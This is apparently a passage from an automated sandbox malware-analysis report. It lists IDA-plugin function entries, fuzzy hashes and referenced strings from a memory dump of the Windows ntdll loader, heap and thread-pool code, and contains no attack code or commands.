                                                      • Instruction Fuzzy Hash: 7A91BD71608345AFDB26EF25CC45EABBAE8BF84B44F40492EFAC496140E774D904CB62
                                                      Strings
                                                      • .Local, xrefs: 010F28D8
                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011321D9, 011322B1
                                                      • SXS: %s() passed the empty activation context, xrefs: 011321DE
                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011322B6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                      • API String ID: 0-1239276146
                                                      • Opcode ID: 56a1ff63d997b5517874d3b1e41bc6f04e8f1d174ab65a9acc0b23b23a38a162
                                                      • Instruction ID: 74f3399708ea131046782e5ef1d07d06cadb9c6ad6c5824e7fb6c4f4ce7bdcf8
                                                      • Opcode Fuzzy Hash: 56a1ff63d997b5517874d3b1e41bc6f04e8f1d174ab65a9acc0b23b23a38a162
                                                      • Instruction Fuzzy Hash: E1A1D13190522ADBDB24DF68CC85BA9B3B0BF98354F1541EDDA88AB651D730DE80CF90
                                                      Strings
                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0112106B
                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01120FE5
                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01121028
                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011210AE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                      • API String ID: 0-1468400865
                                                      • Opcode ID: 9d2e511d342a63bc58eae4f9d741013042c613888e6659698b0a609b11b1aa62
                                                      • Instruction ID: 6e3dbe82ba4a9379c3cbbce05b2c7fcc2059d1d3c243e9333404edaf7d2a3cda
                                                      • Opcode Fuzzy Hash: 9d2e511d342a63bc58eae4f9d741013042c613888e6659698b0a609b11b1aa62
                                                      • Instruction Fuzzy Hash: E071C1719043059FCB21DF18C884F9B7BA8AFA4B54F10056CF9888B286D775D589CFD2
                                                      Strings
                                                      • LdrpDynamicShimModule, xrefs: 0112A998
                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0112A992
                                                      • apphelp.dll, xrefs: 010E2462
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0112A9A2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-176724104
                                                      • Opcode ID: abf13d0506d4542c5818e2afaebcb7bdded9b1d115369c55b80988baf2a324bf
                                                      • Instruction ID: 1c5ca71988d748b52b917a07663a39288ea535c53b8989a5c6cb1e12b6f24173
                                                      • Opcode Fuzzy Hash: abf13d0506d4542c5818e2afaebcb7bdded9b1d115369c55b80988baf2a324bf
                                                      • Instruction Fuzzy Hash: C6316AB5B00312ABDB3D9F5AE8C5AAA7BB9FF84B04F150039E960A7244D77058D1CB40
                                                      Strings
                                                      • HEAP: , xrefs: 010D3264
                                                      • HEAP[%wZ]: , xrefs: 010D3255
                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 010D327D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                      • API String ID: 0-617086771
                                                      • Opcode ID: 13e93c56e872e506947de913ecb2ef77dbf8ae47d3aa2ee3fca83a7311b9fca0
                                                      • Instruction ID: 475ed4feeeba332068d94cd1781b20629714955c81ecaef2b9f86ab9743b526f
                                                      • Opcode Fuzzy Hash: 13e93c56e872e506947de913ecb2ef77dbf8ae47d3aa2ee3fca83a7311b9fca0
                                                      • Instruction Fuzzy Hash: 8392BA71A043499FDB29CF68C440BAEBBF1FF48314F1880A9E999AB391D735A941CF51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-4253913091
                                                      • Opcode ID: a9e753c644568c3631785d50caeca364d54b6d9ee0ebba7f07a6e9d39ea0238e
                                                      • Instruction ID: 99100de74a788c03772876d0d40a2bdfc7f790d6981f5bf6684758563e397acd
                                                      • Opcode Fuzzy Hash: a9e753c644568c3631785d50caeca364d54b6d9ee0ebba7f07a6e9d39ea0238e
                                                      • Instruction Fuzzy Hash: 31F1AF70A00606DFEB19CF68C894BAEB7F6FF45304F1481A8E59A9B385D734E981CB51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: $@
                                                      • API String ID: 2994545307-1077428164
                                                      • Opcode ID: b35ee1ce680b83d4978cd57b717eefa04885b759fa053bb272732494fa6494ed
                                                      • Instruction ID: 52e4931020aabdec7165356128bde71e178995303650eef2eae0c0729f136ea3
                                                      • Opcode Fuzzy Hash: b35ee1ce680b83d4978cd57b717eefa04885b759fa053bb272732494fa6494ed
                                                      • Instruction Fuzzy Hash: FFC29F716083519FDB69CF29C844BAFBBE5AF88704F04892DFAC987241D775D844CB92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                      • API String ID: 0-2779062949
                                                      • Opcode ID: 011ced80e5b360036e3050f047e31221db798b0484ff6b2d64328ccc83c80db2
                                                      • Instruction ID: 2d864cebcfe6f4160263d437f8f11a5fc63a3424430284e06413e83bd80f5e33
                                                      • Opcode Fuzzy Hash: 011ced80e5b360036e3050f047e31221db798b0484ff6b2d64328ccc83c80db2
                                                      • Instruction Fuzzy Hash: F1A16B719556299BDB35EF68CC88BEAF7B8EF48700F1001E9E909A7250D7359E84CF90
                                                      Strings
                                                      • LdrpCheckModule, xrefs: 0112A117
                                                      • Failed to allocated memory for shimmed module list, xrefs: 0112A10F
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0112A121
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-161242083
                                                      • Opcode ID: 6b68fb31109c3b48d174faee371989b98c0e0a43d24efcaf5b2510a830ae88b5
                                                      • Instruction ID: 904566c8b69e316d976c34525813e0f37571152098203e2bc0bb6e2f4cec75f6
                                                      • Opcode Fuzzy Hash: 6b68fb31109c3b48d174faee371989b98c0e0a43d24efcaf5b2510a830ae88b5
                                                      • Instruction Fuzzy Hash: 1971FF70A0030A9FDB29EF69C984AAEB7F4FF44704F14447DE992AB605E374A991CB40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-1334570610
                                                      • Opcode ID: 88ce4003f702e37c04983e954164b010aaef685e649ec9f06a7a7aa3ff0ba223
                                                      • Instruction ID: ca6bb4458fa4b1531834fbf30c01973d007c1d70096f737b70df047d46f21856
                                                      • Opcode Fuzzy Hash: 88ce4003f702e37c04983e954164b010aaef685e649ec9f06a7a7aa3ff0ba223
                                                      • Instruction Fuzzy Hash: 6661B070604301DFDB69CF28C484BAABBE2FF45714F148599F4998F296D770E891CB91
                                                      Strings
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011382E8
                                                      • Failed to reallocate the system dirs string !, xrefs: 011382D7
                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 011382DE
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-1783798831
                                                      • Opcode ID: 201ae57f9ceac6efd3b90d545b2d92d729c4966fa717ddb14e6bb246f6ad1bbb
                                                      • Instruction ID: 568623773298b4247406192f69ae01e7b12bb89c63f8b6846575928830609e07
                                                      • Opcode Fuzzy Hash: 201ae57f9ceac6efd3b90d545b2d92d729c4966fa717ddb14e6bb246f6ad1bbb
                                                      • Instruction Fuzzy Hash: 5F4120B1504309ABD728EB69D986F9B77E8BF58710F00493EFA94D7290E770D840CB91
                                                      Strings
                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0117C1C5
                                                      • @, xrefs: 0117C1F1
                                                      • PreferredUILanguages, xrefs: 0117C212
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                      • API String ID: 0-2968386058
                                                      • Opcode ID: 367afed0eff1d542839cc62abc7d2e971bfe1516b50a31c45c2b3ce9c8bdbb00
                                                      • Instruction ID: e1ab0fdb7325ed18f4a15093bf5b3f9bf81291367bc537749ab778e8c461bd67
                                                      • Opcode Fuzzy Hash: 367afed0eff1d542839cc62abc7d2e971bfe1516b50a31c45c2b3ce9c8bdbb00
                                                      • Instruction Fuzzy Hash: 4B415671E0020AEBDF19DFD8C855FEEB7B9AB54704F14416AE605F7280D7749A44CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                      • API String ID: 0-1373925480
                                                      • Opcode ID: d18148a80b7d5ce9a0353561b25e0101b61c9ac544d692602d47d01aac02b30d
                                                      • Instruction ID: 35d0219708588b32bea3c68e3fdda6c9c2a8e877761f23db1ce044e0647c9bd9
                                                      • Opcode Fuzzy Hash: d18148a80b7d5ce9a0353561b25e0101b61c9ac544d692602d47d01aac02b30d
                                                      • Instruction Fuzzy Hash: 56412272A00368CBEB2ADBD9D844BADBBB4FF55380F140059DD61EBB81E7349981CB11
                                                      Strings
                                                      • LdrpCheckRedirection, xrefs: 0114488F
                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01144899
                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01144888
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                      • API String ID: 0-3154609507
                                                      • Opcode ID: 9c1bb89218627a14ecf4b2c3f58a78302a02e4d894af67ba637b9faddf3794e5
                                                      • Instruction ID: 906cdcc8ceb0423c0ada20adad46296675d75bd555b8591246a1126a6d581c54
                                                      • Opcode Fuzzy Hash: 9c1bb89218627a14ecf4b2c3f58a78302a02e4d894af67ba637b9faddf3794e5
                                                      • Instruction Fuzzy Hash: 1B41E432A00A529FDB29CF9CD840B267BE4FF49E50B06016DED94E7B11E330D801CB81
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-2558761708
                                                      • Opcode ID: 99dde28e25641c4c9a9f4b94c1484bd18d87f921658a3c4ccf5ecceff2d97aef
                                                      • Instruction ID: f2a188000a975d7cecd3b10598becfc40d837888d209e644e7fb6054aa282c20
                                                      • Opcode Fuzzy Hash: 99dde28e25641c4c9a9f4b94c1484bd18d87f921658a3c4ccf5ecceff2d97aef
                                                      • Instruction Fuzzy Hash: 1411E4313182929FDB5DCA19C8D4BFAF7A6EF40625F148169F48ACB255EB30DC50C751
                                                      Strings
                                                      • Process initialization failed with status 0x%08lx, xrefs: 011420F3
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01142104
                                                      • LdrpInitializationFailure, xrefs: 011420FA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2986994758
                                                      • Opcode ID: b91b8e2ecece4a3b319056b8ef60f42c3a1035cca05f3def29ae3d2a063164c9
                                                      • Instruction ID: aff298b926b8901b777fa06d10d4e9ffc77193c614667b978d94842d4f13b509
                                                      • Opcode Fuzzy Hash: b91b8e2ecece4a3b319056b8ef60f42c3a1035cca05f3def29ae3d2a063164c9
                                                      • Instruction Fuzzy Hash: 8FF0C235641308ABE728E64DDC92FA93768EB44F58F940069FB507B685D3F0A980CA91
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: #%u
                                                      • API String ID: 48624451-232158463
                                                      • Opcode ID: b74a320ad5c9f939c7b0dd153d24e62422a17b9fffe304d60c9fa6aede7ded89
                                                      • Instruction ID: 187f1672accb05ab60cc39eb06688544a88ffb3cd327f8a27294e0305de4bef4
                                                      • Opcode Fuzzy Hash: b74a320ad5c9f939c7b0dd153d24e62422a17b9fffe304d60c9fa6aede7ded89
                                                      • Instruction Fuzzy Hash: B07169B1A0020A9FDB05DFA8C980FAEB7F8FF18704F144065E905AB251EB74ED51CBA1
                                                      Strings
                                                      • LdrResSearchResource Enter, xrefs: 010CAA13
                                                      • LdrResSearchResource Exit, xrefs: 010CAA25
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                      • API String ID: 0-4066393604
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$MUI
                                                      • API String ID: 0-17815947
                                                      Strings
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 010C063D
                                                      • kLsE, xrefs: 010C0540
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      • API String ID: 0-2547482624
                                                      Strings
                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 010CA2FB
                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 010CA309
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                      • API String ID: 0-2876891731
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Cleanup Group$Threadpool!
                                                      • API String ID: 2994545307-4008356553
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      • API String ID: 0-1339004836
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .mui
                                                      • API String ID: 0-1199573805
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      Strings
                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0114895E
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                      • API String ID: 0-702105204
                                                      • Opcode ID: ea0e908780d566193bab6175bab2373b2fe7d6565c9bee222379335e58c52749
                                                      • Instruction ID: 38ad58b5256610fa62c6d2c72bd69f9a02bb96dc422bd23e3cd384352e797c18
                                                      • Opcode Fuzzy Hash: ea0e908780d566193bab6175bab2373b2fe7d6565c9bee222379335e58c52749
                                                      • Instruction Fuzzy Hash: DCD1E471A002069BDB18DF69C8C0AFEB7F9BF54308F04852EE955DB2A4EB34D955CB50
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                      • Instruction ID: e7eb66a617c309dc1fdf2587c1d31dbfd9df6af99d578751efc2a238d56d9b26
                                                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                      • Instruction Fuzzy Hash: CDB15374A00605AFDB68DFD9C940EEBBBB9FF84B04F14446DAA4297790DB34E906CB10
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction ID: b45d93123d6653b894515795e6d482afe0730e4a673d77a7e20dd12e960f137a
                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction Fuzzy Hash: 91B10531600756AFDB19DB68C890BBFBBF6AF84300F150199E6969B385D734E941CB90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4309142b5f8a69867dfddfa9f7a85cba8ee16e70577da02d817ad6b42ddc2a83
                                                      • Instruction ID: 2dc41bc75b561d39ff04b487ab7af25bc02d377d674d8a6822ff7467ad24d794
                                                      • Opcode Fuzzy Hash: 4309142b5f8a69867dfddfa9f7a85cba8ee16e70577da02d817ad6b42ddc2a83
                                                      • Instruction Fuzzy Hash: B1C156742083419FD764CF19C494BAFB7E4BF98704F44896EE98987291D7B4E908CF92
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7a2a175f367601811d16961adced5dd8b52310387b1a7a976ad40516f16152b
                                                      • Instruction ID: c53d5fc875ac65c5957777ff29c8a28ed864164e6d3a189a0eb1b88b7758409c
                                                      • Opcode Fuzzy Hash: b7a2a175f367601811d16961adced5dd8b52310387b1a7a976ad40516f16152b
                                                      • Instruction Fuzzy Hash: 97B18270A002668BEB65CF58C990BEDB7F5EF44704F0485EAD58AE7281EB709DC5CB21
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d4d2face619de80676b10406432170cc9b321ca20ff5e3ac3bcaca57a6d0cea8
                                                      • Instruction ID: d5f086871d93cba70ada871201e7f9ed0636e291425835ec1a0f4e0c96751468
                                                      • Opcode Fuzzy Hash: d4d2face619de80676b10406432170cc9b321ca20ff5e3ac3bcaca57a6d0cea8
                                                      • Instruction Fuzzy Hash: B0A14531E0062A9FEB2ADB59C848FAEBBF4FB04754F050161EA90AB2D0D7749D51CBD1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 242ab977b471e23cc69b6adc4b9c81176b1fbbb0f11e2f1dddd6daf024bd05c7
                                                      • Instruction ID: 4888dc9bea8135307e9f5c6b455e99309ee14bef968abb898589ed03ce7bc9ea
                                                      • Opcode Fuzzy Hash: 242ab977b471e23cc69b6adc4b9c81176b1fbbb0f11e2f1dddd6daf024bd05c7
                                                      • Instruction Fuzzy Hash: 51A1C070F0161A9FDB2EDF69C990BAAB7A1FF48358F014029EA45D72C1DBB4E815CB40
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 254cf8d355fbdf2a1a72c25b075ca7c13c15522a44506cabef862e08f50c258d
                                                      • Instruction ID: c64e8209d65ddf529947a66fd636534335f467ef9f75665f992f32f015490613
                                                      • Opcode Fuzzy Hash: 254cf8d355fbdf2a1a72c25b075ca7c13c15522a44506cabef862e08f50c258d
                                                      • Instruction Fuzzy Hash: 2DA1D072A14612DFDB29DF58CA80B5AB7E9FF58704F050528F5A5DBA50C334EC42CB92
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                      • Instruction ID: 6e6576b9438650d43055496b4942a9d2d0aa87d431f84c77c2cf88a0170a59d3
                                                      • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                      • Instruction Fuzzy Hash: E3B13871E0065AEFDF29CFA9C880AADBBF5FF48310F148169E925A7355D730A941CB90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cd943dd76ee5928dab279a5aadc6047473026ba7a1d75d28cf886d6fed2182a0
                                                      • Instruction ID: a42cfa15e71f5ce8571074c5ad89e917275e5906d79dc6b62551e2bc499929c1
                                                      • Opcode Fuzzy Hash: cd943dd76ee5928dab279a5aadc6047473026ba7a1d75d28cf886d6fed2182a0
                                                      • Instruction Fuzzy Hash: 7391C471E04216AFDF19CFA8D894BAEBFB5AF4AB14F154169E614EB340D734D900CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 75d31e43592a13e792a637e2572a24410b182a225f028bdec125c50908ab749f
                                                      • Instruction ID: fd96bd2fec8d34e0ecd02eef350f0cb6df179d613694fd144f45a7ce97648433
                                                      • Opcode Fuzzy Hash: 75d31e43592a13e792a637e2572a24410b182a225f028bdec125c50908ab749f
                                                      • Instruction Fuzzy Hash: 76911532A0072ACBEB28DB5DC480BBE7BA1EF94758F054169E9859F284FB34DD41CB51
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
